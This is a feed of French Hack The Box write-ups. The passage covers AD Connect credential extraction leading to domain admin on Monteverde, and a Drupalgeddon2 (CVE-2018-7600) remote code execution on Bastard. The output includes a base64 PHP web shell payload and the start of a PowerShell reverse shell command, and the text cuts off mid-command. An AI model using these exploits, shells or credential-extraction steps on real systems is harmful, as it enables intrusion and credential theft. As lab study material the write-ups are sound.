class="nv">$username</span>.Username<span class="o">)</span> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Password: &#34;</span> + <span class="nv">$password</span>.Password<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="output">Output </h3><p>Après correction des guillements, on execute le .ps1 et obtient les creds admin :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; .<span class="se">\d</span>ecrypt.ps1 </span></span><span class="line"><span class="cl">AD Connect Sync Credential Extract POC </span></span><span class="line"><span class="cl">&lt;encrypted-attributes&gt; </span></span><span class="line"><span class="cl"> &lt;attribute <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;password&#34;</span>&gt;d0m@in4dminyeah!&lt;/attribute&gt; </span></span><span class="line"><span class="cl">&lt;/encrypted-attributes&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Domain: MEGABANK.LOCAL </span></span><span class="line"><span class="cl">Username: administrator </span></span><span class="line"><span class="cl">Password: d0m@in4dminyeah! </span></span></code></pre></td></tr></table> </div> </div><h3 id="administrator-pwned">Administrator pwned </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>Jul 20, <span class="m">2025</span> - 14:56:12 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Monteverde <span class="c1"># evil-winrm -u &#34;administrator&#34; -p &#39;d0m@in4dminyeah!&#39; -i 10.10.10.172</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">9f15.....9bf4 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours bien vérifier les scripts trouvés. Debug puis trouver l&rsquo;erreur. Attention au guillemets suspects, toujours remplacer par &lsquo;&quot;&rsquo; ou &lsquo;&quot;&rsquo;.</li> </ul>https://leopoldabgn.github.io/writeups/p/planning-htb/Sat, 12 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/planning-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Planning cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Planning</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.68</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <p>Soon :)</p>https://leopoldabgn.github.io/writeups/p/bastard-htb/Fri, 11 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/bastard-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Bastard cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Bastard</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.9</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -p- -An -vvv 10.10.10.9 </span></span><span class="line"><span class="cl">Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-07-11 15:53 CEST </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORTSTATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">36</span> disallowed entries </span></span><span class="line"><span class="cl"><span class="p">|</span> /includes/ /misc/ /modules/ /profiles/ /scripts/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php </span></span><span class="line"><span class="cl"><span class="p">|</span> /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /user/register/ /user/password/ /user/login/ /user/logout/ /?q<span class="o">=</span>admin/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /?q<span class="o">=</span>comment/reply/ /?q<span class="o">=</span>filter/tips/ /?q<span class="o">=</span>node/add/ /?q<span class="o">=</span>search/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_/?q<span class="o">=</span>user/password/ /?q<span class="o">=</span>user/register/ /?q<span class="o">=</span>user/login/ /?q<span class="o">=</span>user/logout/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: Drupal <span class="m">7</span> <span class="o">(</span>http://drupal.org<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Welcome to Bastard <span class="p">|</span> Bastard </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49154/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">Warning: OSScan results may be unreliable because we could not find at least <span class="m">1</span> open and <span class="m">1</span> closed port </span></span><span class="line"><span class="cl">Device type: general purpose<span class="p">|</span>phone<span class="p">|</span>specialized </span></span><span class="line"><span class="cl">Running <span class="o">(</span>JUST GUESSING<span class="o">)</span>: Microsoft Windows 8<span class="p">|</span>Phone<span class="p">|</span>2008<span class="p">|</span>7<span class="p">|</span>8.1<span class="p">|</span>Vista<span class="p">|</span><span class="m">2012</span> <span class="o">(</span>92%<span class="o">)</span> </span></span><span class="line"><span class="cl">OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 </span></span><span class="line"><span class="cl">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete </span></span><span class="line"><span class="cl">Aggressive OS guesses: Microsoft Windows 8.1 Update <span class="m">1</span> <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows Phone 7.5 or 8.0 <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> or Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 or Windows 8.1 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 SP1 or Windows <span class="m">8</span> <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> SP1 or Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> SP1 or Windows Server <span class="m">2008</span> SP2 or <span class="m">2008</span> R2 SP1 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Vista SP0 or SP1, Windows Server <span class="m">2008</span> SP1, or Windows <span class="m">7</span> <span class="o">(</span>91%<span class="o">)</span> </span></span><span class="line"><span class="cl">No exact OS matches <span class="k">for</span> host <span class="o">(</span><span class="nb">test</span> conditions non-ideal<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="drupal-754">Drupal 7.54 </h3><p>On découvre sur le port 80 une page de login. Il est mentionné qu&rsquo;il s&rsquo;agit d&rsquo;un site web Drupal. On trouve la version de Drupal dans un fichier changelog.txt :</p> <blockquote> <p>http://10.10.10.9/changelog.txt Drupal 7.54, 2017-02-01</p> </blockquote> <h3 id="cve-2018-7600--drupalgeddon2">CVE-2018-7600 | drupalgeddon2 </h3><p>En utilisant searchsploit, on trouve une RCE qui ne necessite pas d&rsquo;authentification et qui fonctionne pour les versions avant 7.58 (donc OK pour 7.54).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ searchsploit drupal 7.54 </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution <span class="p">|</span> php/webapps/44449.rb </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ searchsploit -m php/webapps/44449.rb </span></span><span class="line"><span class="cl"> Exploit: Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution </span></span><span class="line"><span class="cl"> URL: https://www.exploit-db.com/exploits/44449 </span></span><span class="line"><span class="cl"> Path: /opt/tools/exploitdb/exploits/php/webapps/44449.rb </span></span><span class="line"><span class="cl"> Codes: CVE-2018-7600 </span></span><span class="line"><span class="cl"> Verified: True </span></span><span class="line"><span class="cl">File Type: Ruby script, ASCII text </span></span><span class="line"><span class="cl">Copied to: /workspace/drupwn/44449.rb </span></span></code></pre></td></tr></table> </div> </div><p>On lance l&rsquo;exploitation, et on obtient directement un shell non-interactif sur lequel on peut executer des commandes.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ruby 44449.rb http://10.10.10.9 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> --<span class="o">==[</span>::#Drupalggedon2::<span class="o">]==</span>-- </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Target : http://10.10.10.9/ </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found : http://10.10.10.9/CHANGELOG.txt <span class="o">(</span>HTTP Response: 200<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Drupal!: v7.54 </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Form <span class="o">(</span>user/password<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Form valid </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Clean URLs </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Clean URLs enabled </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Code Execution <span class="o">(</span>Method: name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> CGATSMRW </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : CGATSMRW </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Good News Everyone! Target seems to be exploitable <span class="o">(</span>Code execution<span class="o">)</span>! w00hooOO! </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>./<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/sites/default/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>sites/default/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee sites/default/shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/sites/default/files/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>sites/default/files/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Moving : ./sites/default/files/.htaccess </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak<span class="p">;</span> <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee sites/default/files/shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> FAILED : Couldn<span class="err">&#39;</span>t find a writeable web path </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dropping back to direct OS commands </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\i</span>usr </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; dir </span></span><span class="line"><span class="cl">Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is C4CD-C60B </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">19/03/2017 09:04 �� &lt;DIR&gt; . </span></span><span class="line"><span class="cl">19/03/2017 09:04 �� &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">317</span> .editorconfig </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">174</span> .gitignore </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 5.969 .htaccess </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 6.604 authorize.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 110.781 CHANGELOG.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.481 COPYRIGHT.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">720</span> cron.php </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; includes </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">529</span> index.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">703</span> install.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��17.995 INSTALL.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��18.092 LICENSE.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 8.710 MAINTAINERS.txt </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; misc </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; modules </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; profiles </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 5.382 README.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 2.189 robots.txt </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; scripts </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; sites </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; themes </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��19.986 update.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��10.123 UPGRADE.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 2.200 web.config </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">417</span> xmlrpc.php </span></span><span class="line"><span class="cl"> <span class="m">21</span> File<span class="o">(</span>s<span class="o">)</span> 217.261 bytes </span></span><span class="line"><span class="cl"> <span class="m">9</span> Dir<span class="o">(</span>s<span class="o">)</span> 4.135.231.488 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; dir C:<span class="se">\U</span>sers </span></span><span class="line"><span class="cl">Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is C4CD-C60B </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\U</span>sers </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; . </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">19/03/2017 02:20 �� &lt;DIR&gt; Administrator </span></span><span class="line"><span class="cl">19/03/2017 02:54 �� &lt;DIR&gt; Classic .NET AppPool </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; dimitris </span></span><span class="line"><span class="cl">14/07/2009 07:57 �� &lt;DIR&gt; Public </span></span><span class="line"><span class="cl"> <span class="m">0</span> File<span class="o">(</span>s<span class="o">)</span> <span class="m">0</span> bytes </span></span><span class="line"><span class="cl"> <span class="m">6</span> Dir<span class="o">(</span>s<span class="o">)</span> 4.134.649.856 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\d</span>imitris<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">292f.....ec9d </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable Shell </h3><p>En allant sur <a class="link" href="https://www.revshells.com/" target="_blank" rel="noopener" >https://www.revshells.com/</a>, j&rsquo;ai pu générer rapidement un script de revershell. J&rsquo;ai utilisé :</p> <ul> <li>PowerShell #3 (Base64)</li> </ul> <p>Ce qui m&rsquo;a donné la commande suivante. Pratique, car aucun caractère spécial.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">powershell -e <span 